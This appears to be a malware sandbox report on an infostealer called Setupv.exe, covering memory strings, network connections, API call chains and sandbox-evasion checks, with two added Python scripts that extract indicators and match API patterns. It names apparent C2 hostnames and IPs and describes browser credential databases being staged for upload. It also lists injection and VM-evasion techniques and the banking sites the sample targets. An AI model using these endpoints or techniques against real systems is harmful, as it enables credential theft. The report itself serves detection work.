        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
        Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknown HTTPS traffic detected: 172.67.182.68:443 -> 192.168.2.5:49695 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 23.52.218.12:443 -> 192.168.2.5:49698 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49699 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49700 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49701 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49703 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49704 version: TLS 1.2
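The URL strings above mix the sample's own infrastructure with Steam and browser page content that the stealer pulled into its heap, and the TLS lines show six of the eight connections going to a single server IP. The Python below is an added example, not part of the Joe Sandbox report, that parses lines in the two formats shown (memory strings and TLS connections), drops hosts on an analyst-chosen benign list (an assumption for this sample, not something the report states), skips strings cut off at a memory read boundary such as `https://store.steampowered.`, and groups the remaining hosts by the memory dumps they were found in. The sample lines are constructed from entries in this report.

```python
"""Pull network IOCs out of sandbox 'String found in binary or memory' and
'HTTPS traffic detected' lines.

Added example for this report, not Joe Sandbox code. The benign-domain list is
an analyst assumption (browser and Steam content the stealer scraped into its
heap), and SAMPLE_LINES are constructed from entries in the report.
"""
from __future__ import annotations

import re
from collections import Counter
from urllib.parse import urlsplit

# Hosts that show up only because the sample read browser data and a Steam page
# (assumption for this example; review before reusing on another sample).
BENIGN_SUFFIXES = (
    "steamcommunity.com", "steampowered.com", "akamaized.net", "steamloopback.host",
    "valvesoftware.com", "mozilla.org", "google.com", "gstatic.com", "gstatic.cn",
    "youtube.com", "amazon.com", "bestbuy.com", "ecosia.org",
)

URL_LINE = re.compile(r"String found in binary or memory:\s*(https?://\S+)")
TLS_LINE = re.compile(r"HTTPS traffic detected:\s*(\d+\.\d+\.\d+\.\d+):(\d+)\s*->\s*(\d+\.\d+\.\d+\.\d+):(\d+)")
# Joe Sandbox memory-dump ids as they appear in the Source column.
DUMP_ID = re.compile(r"\d{8}\.\d{8}\.\d+\.[0-9A-F]{16}(?:\.[0-9A-F]{8}){4}\.sdmp")


def host_of(url: str) -> str | None:
    """Hostname of a memory string, or None when it cannot be parsed.

    Heap strings carry trailing junk ("/qenaJ", "/banb8") and an explicit ":443";
    urlsplit separates host from port and path, so neither matters. A host that
    ends in "." is a string cut off at a read boundary ("store.steampowered.").
    """
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return None
    return host.lower() if host else None


def is_benign(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def extract_iocs(lines) -> tuple[dict[str, set[str]], Counter[str]]:
    """Return (suspicious host -> dump ids it appeared in, TLS connections per server IP)."""
    hosts: dict[str, set[str]] = {}
    servers: Counter[str] = Counter()
    for line in lines:
        m = URL_LINE.search(line)
        if m:
            host = host_of(m.group(1))
            if host is None or host.endswith(".") or is_benign(host):
                continue  # unparsable, truncated, or scraped browser content
            hosts.setdefault(host, set()).update(DUMP_ID.findall(line))
            continue
        m = TLS_LINE.search(line)
        if m:
            servers[m.group(1)] += 1  # group 1 is the server side of the flow
    return hosts, servers


def render(lines) -> str:
    """Plain-text IOC summary, one host or IP per line."""
    hosts, servers = extract_iocs(lines)
    out = [f"host {h}  dumps={len(ids)}" for h, ids in sorted(hosts.items())]
    out += [f"ip {ip}  tls_connections={n}" for ip, n in sorted(servers.items())]
    return "\n".join(out)


# Constructed from entries in this report (a subset, not the full list).
SAMPLE_LINES = [
    "Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611998455130350",
    "Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.",
    "Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.",
    "Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://topographky.top/f.ms1&",
    "Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://toptalentw.top/qenaJ",
    "Source: Setupv.exe, 00000000.00000003.1845958800.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPK",
    "Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://transdataa.digital/",
    "Source: unknown HTTPS traffic detected: 172.67.182.68:443 -> 192.168.2.5:49695 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49699 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49700 version: TLS 1.2",
]

if __name__ == "__main__":
    print(render(SAMPLE_LINES))
```

What survives the filter on the full list is exactly the set of `.top`, `.live`, `.run` and `.digital` hosts that the "C2 URLs / IPs found in malware configuration" signature refers to. Two caveats when turning this into detection: 104.21.36.133 and 172.67.182.68 sit in Cloudflare's announced address space, so the IPs are weak indicators and the hostnames (or TLS SNI) should be pinned instead; and the `toptalentw.top:443/qena...zchhhv.default-release/key4.dbPK` string is a heap buffer where the C2 URL, a Firefox profile path to `key4.db` and a ZIP local-file header (`PK`) sit side by side, which is consistent with an archive of browser data being staged for upload to that host.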
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E4C950 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E4C950 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_00BA10E8 NtTerminateThread
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_00BA0B72 NtGetContextThread,NtSetContextThread,NtResumeThread
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_00BA0CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_00BA066E NtProtectVirtualMemory
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02731F66 NtFreeVirtualMemory
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02731F13 NtAllocateVirtualMemory
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02731FA4 NtProtectVirtualMemory
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E35A80
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1DBA0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E54BB0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E220F8
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E5B9D0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E3D910
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1B7C0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E25F70
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E2B4FD
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E5C4C0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E2EC24
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E25418
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E50DB0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E19290
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E32260
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1AA70
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E46A70
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E25A77
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1C3F0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E20BC0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E2E3CC
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E3AB96
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1CB70
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E55B70
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E50370
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E300E0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E138D0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E130D0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E3A0D7
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1A070
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E591E0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E599F0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E189C0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E4C1A0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1F980
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E21149
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E5C150
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E36900
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E50110
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E3468B
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E51E90
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E23E60
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E34E50
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E5BE50
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E297F0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E177A0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E59FB0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1EF5C
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E1D730
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E334F8
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E2DCD0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E184B0
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E23490
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E245FF
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E59540
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E49D00
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02730509
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02730000
        Source: C:\Users\user\Desktop\Setupv.exe Code function: String function: 02E1B110 appears 34 times
        Source: Setupv.exe Static PE information: invalid certificate
        Source: Setupv.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
        Source: Setupv.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/3
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02730C19 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle
        Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E50DB0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW
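The API chains in these Code function entries are the behavioural evidence behind several signatures in the summary: NtGetContextThread followed by NtSetContextThread and NtResumeThread is the thread-context hijack pattern, CreateToolhelp32Snapshot/Thread32First/Wow64SuspendThread enumerates and suspends threads, OpenClipboard/GetClipboardData/GlobalLock reads the clipboard, and CoCreateInstance/CoSetProxyBlanket/VariantInit is the usual COM setup before a WMI query. The Python below is an added example, not Joe Sandbox code, that parses such lines and matches ordered API subsequences against a small signature table; the signature names and the sample lines (constructed from entries above) are this example's own. It also shows the weaker program-wide match, which is needed here because the report lists NtAllocateVirtualMemory and NtProtectVirtualMemory in separate functions.

```python
"""Match ordered API-call patterns in sandbox 'Code function' lines.

Added example for this report, not Joe Sandbox code. Signature names and
SAMPLE_LINES are constructed for the example; the API chains themselves are
the ones the report lists above.
"""
from __future__ import annotations

import re

# "Code function: 0_3_00BA0B72 NtGetContextThread,NtSetContextThread,..." with an
# optional API list; the raw report repeats the function id after the list.
CODE_FUNC = re.compile(r"Code function:\s*(\d+_\d+_[0-9A-F]+)(?:\s+([A-Za-z0-9_,]+))?")

# Ordered API subsequences; other calls may sit between the listed ones.
SIGNATURES = {
    "thread-context-hijack": ("NtGetContextThread", "NtSetContextThread", "NtResumeThread"),
    "thread-enumerate-suspend": ("CreateToolhelp32Snapshot", "Thread32First", "Wow64SuspendThread"),
    "clipboard-read": ("OpenClipboard", "GetClipboardData", "GlobalLock"),
    "wmi-query-via-com": ("CoCreateInstance", "CoSetProxyBlanket", "VariantInit"),
    # Alloc + protect inside one function is the classic RWX staging pattern.
    "rwx-memory-staging": ("NtAllocateVirtualMemory", "NtProtectVirtualMemory"),
}


def parse_code_function(line: str) -> tuple[str, list[str]] | None:
    """Return (function_id, api_names) for a Code function line, else None."""
    m = CODE_FUNC.search(line)
    if not m:
        return None
    func_id = m.group(1)
    apis = (m.group(2) or "").split(",")
    # Drop empty fields and the trailing repeat of the function id.
    return func_id, [a for a in apis if a and a != func_id]


def is_subsequence(needle, haystack) -> bool:
    """True if every name in needle appears in haystack, in that order."""
    it = iter(haystack)
    return all(name in it for name in needle)


def classify(lines) -> dict[str, list[str]]:
    """Per-function hits: function id -> sorted signature names (hits only)."""
    hits: dict[str, list[str]] = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue
        func_id, apis = parsed
        names = sorted(n for n, seq in SIGNATURES.items() if is_subsequence(seq, apis))
        if names:
            hits[func_id] = names
    return hits


def program_level(lines) -> list[str]:
    """Weaker check: signatures whose APIs all occur somewhere in the sample.

    Order and function boundaries are ignored, so this catches alloc/protect
    split across two functions, at the cost of more false positives than classify().
    """
    seen: set[str] = set()
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is not None:
            seen.update(parsed[1])
    return sorted(n for n, seq in SIGNATURES.items() if set(seq) <= seen)


# Constructed from entries in this report; the third line keeps the raw
# report's trailing function-id repeat to show that the parser drops it.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E4C950 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard",
    r"Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_00BA10E8 NtTerminateThread",
    r"Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_00BA0B72 NtGetContextThread,NtSetContextThread,NtResumeThread,0_3_00BA0B72",
    r"Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02731F13 NtAllocateVirtualMemory",
    r"Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02731FA4 NtProtectVirtualMemory",
    r"Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E35A80",
    r"Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_2_02730C19 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle",
    r"Source: C:\Users\user\Desktop\Setupv.exe Code function: 0_3_02E50DB0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW",
]

if __name__ == "__main__":
    for func_id, names in classify(SAMPLE_LINES).items():
        print(func_id, ", ".join(names))
    print("program-wide:", ", ".join(program_level(SAMPLE_LINES)))
```

The per-function matcher is the one to trust: a single function that fetches a thread's context, rewrites it and resumes the thread is a strong signal regardless of what the sample calls the function. The program-wide matcher only says the building blocks are present somewhere, which is enough to explain the "Detected potential crypto function" and memory-allocation entries above but not enough to assert injection on its own.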
        Source: Setupv.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Setupv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: Setupv.exe, 00000000.00000003.1736021937.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1751408219.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1751046572.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1736465134.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Setupv.exe ReversingLabs: Detection: 27%
        Source: Setupv.exe Virustotal: Detection: 27%
        Source: C:\Users\user\Desktop\Setupv.exe File read: C:\Users\user\Desktop\Setupv.exe
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: aclayers.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: sfc.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: sfc_os.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: oledlg.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: webio.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: wbemcomn.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: amsi.dll
        Source: C:\Users\user\Desktop\Setupv.exe | Section loaded: profapi.dll
        Source: Setupv.exe | Static PE information: More than 209 > 100 exports found
        Source: Setupv.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
        Source: Setupv.exe | Static file information: File size 5298048 > 1048576
        Source: Setupv.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x33e800
        Source: Setupv.exe | Static PE information: Raw size of .reloc is bigger than: 0x100000 < 0x151000
        Source: Setupv.exe | Static PE information: More than 200 imports for USER32.DLL
        Source: Setupv.exe | Static PE information: real checksum: 0xcf457 should be: 0x51792f
        Source: Setupv.exe | Static PE information: section name: .didata
        Source: C:\Users\user\Desktop\Setupv.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\Setupv.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\Desktop\Setupv.exe | System information queried: FirmwareTableInformation
        Source: C:\Users\user\Desktop\Setupv.exe TID: 6424 | Thread sleep time: -210000s >= -30000s
        Source: C:\Users\user\Desktop\Setupv.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D78000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
        Source: Setupv.exe, 00000000.00000003.1816496507.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
